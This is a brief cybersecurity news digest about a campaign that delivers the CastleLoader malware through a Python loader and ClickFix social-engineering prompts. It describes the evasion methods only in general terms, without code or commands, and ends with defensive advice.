Cybersecurity researchers have identified a new campaign involving a Python-based delivery chain that deploys the CastleLoader malware family using ClickFix social engineering prompts. The attack employs memory-only payload execution techniques to avoid detection and utilizes PEB Walking for API resolution. #CastleLoader #ClickFix
Keypoints
- A new malware campaign uses a Python loader to deploy CastleLoader without disk footprint.
- ClickFix social engineering prompts convince users to run verification commands in Windows Run dialog.
- The malware employs in-memory execution and PEB Walking to evade detection and resolve APIs.
- Network markers such as GoogleBot user agent and staging paths link this activity to previous CastleLoader campaigns.
- Organizations are advised to educate users, restrict script execution, and monitor for unusual activity.
Read More: https://www.infosecurity-magazine.com/news/clickfix-rise-castleloader-attacks/